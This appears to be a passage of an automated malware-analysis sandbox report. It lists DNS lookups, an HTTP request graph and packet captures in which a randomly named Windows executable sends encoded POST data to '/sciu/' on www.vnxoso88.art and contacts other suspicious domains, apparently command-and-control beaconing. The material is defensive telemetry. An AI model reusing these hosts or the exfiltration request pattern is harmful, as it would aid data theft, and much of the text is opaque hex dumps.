Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		173.255.194.134	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.33.18.44	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.33.2.79	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		72.14.185.43	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.56.79.23	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		72.14.178.174	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		96.126.123.244	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		198.58.118.167	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.79.19.196	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:10.865350008 CET	1.1.1.1	192.168.2.6	0x89ab	No error (0)	www.dccf.earth	dccf.earth		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:19:10.865350008 CET	1.1.1.1	192.168.2.6	0x89ab	No error (0)	dccf.earth		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:10.865350008 CET	1.1.1.1	192.168.2.6	0x89ab	No error (0)	dccf.earth		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:24.186522007 CET	1.1.1.1	192.168.2.6	0x201b	No error (0)	www.gamebaitopzo.fun		172.67.206.245	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:24.186522007 CET	1.1.1.1	192.168.2.6	0x201b	No error (0)	www.gamebaitopzo.fun		104.21.69.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:38.055056095 CET	1.1.1.1	192.168.2.6	0x537e	No error (0)	www.megaweb8.top		104.21.59.91	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:38.055056095 CET	1.1.1.1	192.168.2.6	0x537e	No error (0)	www.megaweb8.top		172.67.221.220	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:52.262491941 CET	1.1.1.1	192.168.2.6	0xb195	No error (0)	www.wethebeststore.online	wethebeststore.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:19:52.262491941 CET	1.1.1.1	192.168.2.6	0xb195	No error (0)	wethebeststore.online		91.184.0.200	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.39978.club

www.vnxoso88.art

www.rtpakuratkribo.xyz

www.pluribiz.life

www.idaschem.xyz

www.b2iqd.top

www.ipk.app

www.jigg.space

www.dccf.earth

www.gamebaitopzo.fun

www.megaweb8.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49838	206.119.185.225	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:17.336915970 CET	483	OUT	GET /4bhh/?CR=QnXHBNIHO&C4NDALSx=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4= HTTP/1.1 Host: www.39978.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:17:18.299597979 CET	232	IN	HTTP/1.1 530 Date: Mon, 04 Nov 2024 03:17:18 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cdn-ddos-cc Data Raw: 33 63 0d 0a e5 9f 9f e5 90 8d e6 b2 a1 e9 85 8d e7 bd ae e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 30 36 2e 31 31 39 2e 31 38 35 2e 32 32 35 0d 0a 30 0d 0a 0d 0a Data Ascii: 3c206.119.185.2250

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49930	66.29.146.14	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:33.784414053 CET	741	OUT	POST /sciu/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.vnxoso88.art Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.vnxoso88.art/sciu/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 4b 59 44 35 53 38 4a 6a 59 77 72 34 6d 51 47 73 6a 2b 38 71 75 42 6f 4f 39 61 59 4c 7a 67 66 54 41 6a 32 2f 42 4f 32 57 76 38 56 4e 37 77 57 47 6d 57 4a 79 2b 4c 34 6a 59 66 74 68 4d 36 55 6b 6d 47 50 36 35 62 5a 56 53 2b 4c 5a 61 45 38 64 5a 34 6d 49 5a 57 4c 4f 6e 56 78 2f 42 45 77 56 2f 78 65 61 76 68 50 75 68 52 42 47 34 72 46 61 70 54 76 30 68 75 73 62 73 58 70 5a 41 39 76 41 32 69 52 46 2b 6f 52 45 35 73 55 79 6f 7a 65 61 6c 37 58 75 7a 64 50 7a 34 66 64 53 52 52 36 66 30 52 43 66 32 43 6f 56 39 68 7a 46 30 5a 43 64 53 55 34 6d 31 66 34 6e 67 49 38 77 59 53 72 2b Data Ascii: C4NDALSx=VKMOGjG9q3C3KYD5S8JjYwr4mQGsj+8quBoO9aYLzgfTAj2/BO2Wv8VN7wWGmWJy+L4jYfthM6UkmGP65bZVS+LZaE8dZ4mIZWLOnVx/BEwV/xeavhPuhRBG4rFapTv0husbsXpZA9vA2iRF+oRE5sUyozeal7XuzdPz4fdSRR6f0RCf2CoV9hzF0ZCdSU4m1f4ngI8wYSr+
Nov 4, 2024 04:17:34.497009039 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 04 Nov 2024 03:17:34 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 134AZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 4, 2024 04:17:34.497021914 CET	212	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0
Nov 4, 2024 04:17:34.497104883 CET	1236	IN	Data Raw: fb 19 6f ce 65 5a 65 16 d7 d5 07 ce f5 72 18 bf 8a 1f fd ca be bd 1e 6f 3e 18 7a 15 09 b9 39 a7 f7 cb 6e 94 f3 72 e0 7e b6 fe 07 00 ba c9 d7 9f 19 fe 8d ea 07 c1 67 32 01 aa fd 5f 04 9f 1f c3 46 5d c4 7f 72 cc ca 7c b8 84 11 38 4f fd bf 58 66 e9 Data Ascii: oeZero>z9nr~g2_F]r\|8OXf/^j-2M^G_T(-m8?nCKjy{Z@/*P:}[dlR($};Lk! }q%fN~6_eAjxYPwgRgqSj\|Ij
Nov 4, 2024 04:17:34.497113943 CET	212	IN	Data Raw: 39 b4 bc 94 a9 89 bc dc 1a 5c 5b 1f 87 04 15 28 6e 87 cb a6 a8 2e 5a 41 14 d5 58 8d 14 ab 2d b5 69 ee 24 8e 05 07 2c b9 5e b1 4c bb a6 6b 72 8b 23 e5 4a 0c 57 63 80 98 76 3f 66 7c ca 65 0f b1 29 4d a2 8a 62 11 48 ea 5a 70 39 4d ee ca b5 29 65 9a Data Ascii: 9\[(n.ZAX-i$,^Lkr#JWcv?f\|e)MbHZp9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~
Nov 4, 2024 04:17:34.497119904 CET	1236	IN	Data Raw: a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b6 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 Data Ascii: cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]F9I?!S@kpF38'!6I;ywV4-"g)W3i$v#TsT2r,.,$ .P,-i@DU\-
Nov 4, 2024 04:17:34.497143984 CET	1098	IN	Data Raw: 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 Data Ascii: uW$FNcYXp8.Y=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC0I+s:F7H\|He+sZD'0,p$dEzBtb($Uk65

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49944	66.29.146.14	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:36.328598976 CET	765	OUT	POST /sciu/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.vnxoso88.art Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.vnxoso88.art/sciu/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 59 49 54 35 54 66 52 6a 5a 51 72 2f 34 41 47 73 34 4f 38 75 75 42 6b 4f 39 65 70 55 79 57 76 54 41 43 47 2f 43 50 32 57 6a 63 56 4e 7a 51 57 4a 37 6d 4a 39 2b 4c 30 30 59 65 52 68 4d 36 41 6b 6d 48 2f 36 34 6f 68 53 41 2b 4c 62 52 6b 39 37 61 49 6d 49 5a 57 4c 4f 6e 56 31 5a 42 46 55 56 2f 67 4f 61 31 44 6e 74 2f 42 42 5a 2f 72 46 61 74 54 76 34 68 75 74 34 73 57 31 7a 41 2f 58 41 32 6a 68 46 2b 39 74 48 77 73 56 35 6c 54 65 49 6a 71 47 66 36 2f 36 74 32 63 74 4a 47 78 2f 36 31 6e 66 46 71 78 6f 32 76 78 54 48 30 62 61 76 53 30 34 4d 33 66 41 6e 79 66 77 58 58 6d 4f 64 54 35 50 33 2b 46 49 55 70 78 78 58 43 42 79 71 66 50 6d 66 73 41 3d 3d Data Ascii: C4NDALSx=VKMOGjG9q3C3YIT5TfRjZQr/4AGs4O8uuBkO9epUyWvTACG/CP2WjcVNzQWJ7mJ9+L00YeRhM6AkmH/64ohSA+LbRk97aImIZWLOnV1ZBFUV/gOa1Dnt/BBZ/rFatTv4hut4sW1zA/XA2jhF+9tHwsV5lTeIjqGf6/6t2ctJGx/61nfFqxo2vxTH0bavS04M3fAnyfwXXmOdT5P3+FIUpxxXCByqfPmfsA==
Nov 4, 2024 04:17:37.036675930 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 04 Nov 2024 03:17:36 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 1354ZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 4, 2024 04:17:37.036698103 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 4, 2024 04:17:37.036714077 CET	424	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 4, 2024 04:17:37.036755085 CET	1236	IN	Data Raw: a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b6 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 Data Ascii: cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]F9I?!S@kpF38'!6I;ywV4-"g)W3i$v#TsT2r,.,$ .P,-i@DU\-
Nov 4, 2024 04:17:37.036767960 CET	1093	IN	Data Raw: 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 Data Ascii: uW$FNcYXp8.Y=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC0I+s:F7H\|He+sZD'0,p$dEzBtb($Uk65

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49958	66.29.146.14	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:38.875983953 CET	1778	OUT	POST /sciu/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.vnxoso88.art Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.vnxoso88.art/sciu/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 59 49 54 35 54 66 52 6a 5a 51 72 2f 34 41 47 73 34 4f 38 75 75 42 6b 4f 39 65 70 55 79 57 6e 54 42 30 61 2f 41 73 65 57 69 63 56 4e 39 77 57 4b 37 6d 4a 67 2b 4c 64 63 59 65 64 78 4d 38 4d 6b 6e 6c 33 36 73 4a 68 53 4b 2b 4c 62 65 45 38 63 5a 34 6d 64 5a 57 62 4b 6e 56 6c 5a 42 46 55 56 2f 6a 6d 61 37 42 50 74 39 42 42 47 34 72 46 57 70 54 76 55 68 75 56 47 73 57 78 4a 41 50 33 41 32 44 78 46 2f 50 46 48 2f 73 56 37 72 7a 66 62 6a 71 4b 45 36 37 61 66 32 63 70 7a 47 32 33 36 30 79 44 54 30 6c 59 52 34 48 4c 36 30 49 61 71 4b 54 41 42 34 66 42 57 78 38 46 6c 53 69 4f 75 51 5a 62 64 74 44 63 4d 67 6e 4a 36 45 58 58 67 63 65 72 72 2b 46 67 35 2f 30 47 66 71 52 59 6b 43 4b 45 2b 67 63 45 78 6d 69 35 2f 30 38 52 61 56 6c 6b 30 5a 4b 72 6e 53 2f 6f 61 32 42 4d 42 4e 34 65 6d 57 78 6e 46 4d 46 55 46 30 36 6f 32 30 39 6d 36 75 4f 66 4b 56 53 7a 65 4a 61 50 78 76 72 46 2f 50 43 35 58 65 35 46 58 76 73 78 4b 44 30 2b 73 49 31 55 50 75 43 71 67 70 [TRUNCATED] Data Ascii: C4NDALSx=VKMOGjG9q3C3YIT5TfRjZQr/4AGs4O8uuBkO9epUyWnTB0a/AseWicVN9wWK7mJg+LdcYedxM8Mknl36sJhSK+LbeE8cZ4mdZWbKnVlZBFUV/jma7BPt9BBG4rFWpTvUhuVGsWxJAP3A2DxF/PFH/sV7rzfbjqKE67af2cpzG2360yDT0lYR4HL60IaqKTAB4fBWx8FlSiOuQZbdtDcMgnJ6EXXgcerr+Fg5/0GfqRYkCKE+gcExmi5/08RaVlk0ZKrnS/oa2BMBN4emWxnFMFUF06o209m6uOfKVSzeJaPxvrF/PC5Xe5FXvsxKD0+sI1UPuCqgpf/R+ynkTotJ7kGw+6wDJR9e1oERwRZ29ct1sTpPBuRHYMeffNv2CCxychMFSoFq9ThkytlFPXocUIm6WUSgNk2Dk/+M2FmV8faM5u20NGa4uMrooYuSE31fdrWxX7OKB1t9/xXr9rJzcHc4eursO/+Y/XtwOFk1iKMgu/a/nHOtXjyQCRfdQcQklQWPtiXvQ53KPLeE3WTR+SucIhCGvdc22BL3bAeQjeAKs0JVMowVsS3VmucJ1bPjAkfpMJjzvmM0Mu/k7L6CTE5xftl+MkJGi8uB1rdOqTvg/cFaaANr1jlwTWrKPESLW1KbaScrNCb8whUA1wvBLzww0dTZLZTkeADPeYHfLuZUCDq3gwW7NwzeT167DLLcsv53GDcieMXn0tINRDRXUZCd7lp8F3SQQ02zMyA0H84FM22+QTc8YHbSY1Lqe2pqxrTMzc6Rw1JF0YI4bUyDRsEoNT4nUYey1r0wiNGF7u6WygBBg/Znh4HVZBjrKYzHoHi0V/Kd7VjEAGjAMUEM2KzLJA9bbUyV9mvAItLYEd/0skEII14iN7FbAvjPX5YmnipobpLmir+poeuG4VdMAS91/sMXEKDI78v7uNdrLziuLp5fnUTj5g+gpdAFN0dYK4i8VXClwTmG6kp94QtWJlaagPhutS50c2snX86nv/D [TRUNCATED]
Nov 4, 2024 04:17:39.585684061 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 04 Nov 2024 03:17:39 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 43 12 20 21 09 04 08 87 e3 86 d0 8e 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee c9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 da b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e [TRUNCATED] Data Ascii: 134AZJvLRMUhC !V's=pB<w?qve o=\|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s*^o/^9~$O~nUh[_[_~\Vgay~0S>pC?W#cE/0Q.1lc8~,'LMb~]YUnq',l4r3-YuexoPo~tn}+{io{_-/+K`Y\|A/p2K?_W]tjW\|,7J\Xu]ps6abNicK{#~}XIyC;0\)L\?=nxUU<=u%tt=xwoqz=@Hq>U 15>!{6-g[yeG5zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi+}`dmyG;].Q>P\|}m_>7)z=^Kp#Q{+%@R],q>gM&@N[\p OKZ/G;
Nov 4, 2024 04:17:39.585727930 CET	1236	IN	Data Raw: 02 25 f0 37 33 bc f1 f3 b7 c4 75 42 6b f0 a7 04 04 d2 17 c3 8c 47 64 de fd f9 66 9b 5b d4 de 0c f7 ca cb b3 f2 92 a1 1e 06 85 1b 83 58 d7 dc 38 60 3f a7 8f 58 c0 7f da 87 41 10 3a 8e 9b be b1 d4 8f f6 ed 2a 3f 5d 90 fd ec d7 ef e7 bd b1 df af b8 Data Ascii: %73uBkGdf[X8`?XA:?]e,O?FH%\pC{Ov=}K;c#,{tRz2}GH}/>7y!#?`c3Y\W8a~+z`U$
Nov 4, 2024 04:17:39.585741043 CET	424	IN	Data Raw: 36 5c 94 38 35 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 51 b6 2d ea ac d3 19 ae 69 a5 93 5c 9b ca 8c c1 49 93 ae 45 ed 60 1a 32 74 96 44 67 bc 23 f0 18 4a eb 8d 90 6c 82 48 2b 11 6b 64 8e 4d 71 ed 8e c7 58 82 56 bb d8 60 f8 60 26 51 d1 28 ad e7 Data Ascii: 6\85%..?,Q-i\IE`2tDg#JlH+kdMqXV``&Q(<?KE-OekvLk^}<+hBVl1.->:qM#;7s7H38+\7bL\Y~Ht9#1KG8DQx)rBFY(4,6&!A%iV$-"u
Nov 4, 2024 04:17:39.585752010 CET	1236	IN	Data Raw: b7 30 ce 31 bb 90 4f 21 b5 83 e6 5b 90 6d 96 c3 f0 58 48 84 96 d6 4a ec 91 d9 9a df cf 48 7a 38 1c 69 da 0c 99 2b c5 ea 80 55 e1 c6 b3 27 69 80 04 aa 94 9b fc 5a 38 24 0c ed 62 7b 6a 68 e0 ad dc 85 59 c8 17 7a 82 a5 75 e0 90 9a ce d2 a4 d4 ae 74 Data Ascii: 01O![mXHJHz8i+U'iZ8$b{jhYzutz.]+V=?!(@`F8'!I;yw<*sgTK3HYJn}XuuF.4qO1EA426!a$)g}6/2#Ib6
